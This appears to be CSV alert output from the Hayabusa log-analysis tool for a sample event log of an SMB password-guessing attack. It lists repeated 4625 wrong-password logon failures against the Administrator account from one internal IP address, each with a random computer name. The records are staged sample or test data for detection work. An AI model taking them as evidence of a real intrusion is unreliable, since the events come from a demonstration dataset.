Administrator | Type: 3 | Computer: 0VsPitzItsjU3Y59 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HEq6vk4nTe3weSOP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.507 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lE8kvmcQtCmlsqtT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXmfjxrGC3liZ2oh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.589 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 72JLcUBrhOoXPLzD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.635 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sRoFpK2ZvBYy4jGM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:07.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9KReiI3k2WIKpxFq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.722 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wsfSzPbji6ARhU0k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: axeCxygvJ4zL4Xoq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.809 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y64sc51Y7vbiFTIQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o395tRQcfRBTTCSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K1R4wlYWS4SkM3dF | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.938 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RsZy0Yjvk720Mu22 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c8RusStjhReKBmS0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.026 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eJuPYLTcGaGvErLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: raCbua01mzU1Djuf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fnt8atAbMtxXivUs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.165 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: psokvQJyMn5m5rMh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wTPGqOITsOhpTgIF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xxhGrLzhwNziihc9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UIb1lHuPaC62UlBp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.338 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2uvXuLIR9yvmWngF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.382 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MI35CCybjNtntfwo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:08.426 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0GTJfOkk0fUC5YCX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jk6PsiAiLPsHGUh1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KeGDMp9My5eLJz55 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BvDQphjvwOCsNQqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sbJhad4aocvPMYVP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.635 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJl3XqTUxvqiKKaG | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a1fAJDfguuoNxWiR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: daAeGcsqoqERsEu6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0iynnwxS8v4C5b3E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.955 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2kU7IS4XCvgRpTff | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MBC8AJXBQHrCMrO2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: NSGraDQmI4MAq9Ls | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B7u2Pb9y8hB0iYWh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A657rbd6k4AD7M4i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7rkiDUBuTCU2jDXR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jjsCFTQoobrkQoWF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.273 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2dNXav95nZyBhVOc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:09.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yeq1x56Ct6R2Nu3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pUwyCNtwydEQu2bd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bX7eihAOk3PUgbwM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WPXqAsaYaXEr8I9L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4SaEmIpmlH1VMDun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.534 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a3Dvp43a2h7Mzx2H | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.575 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g3voKlRXc7rIaIYs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GF1Q5OhCLRAi96mN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: caHe4iY2CQoiumQI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.734 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJi6UAm6Pp6eax8Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EW0t2wapD8yniO4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: PnaITXTihpB0stwx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.913 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tdBVoa82WKEAW2ce | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BelKzJrEjGIcU2dN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ujeb7fRHPGCGmFm2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Czwt7KF2sQHemwdJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LQQ4nNpbfKKVCJZH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:10.157 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6jwIc6e0AHAhXKK5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nld9Job0Ll1Fgtmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.242 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q9sS6i9iU3PXhokz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: heaYv6Np8swhoVc9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.334 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I7rzgNBtUJkS93pO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gh45suNQ09FzPBjd | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BOnwAGxxz994k6Ee | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.474 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L26mvUKOgGptcKaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.517 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aqldRjcLl8KFZr5h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ycNPBtmRHShPOcRA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ISlMGsVvXry0rbju | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: MjGjh70EQ5YVGJUt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yaYM5N2kuvuRCHRU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.738 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 32wgj2t7BLBviVxd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vr1kMRxLEaCIWIbf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4PHEJyKgp5wXRtBk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbaoz8rTZVXUjRAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
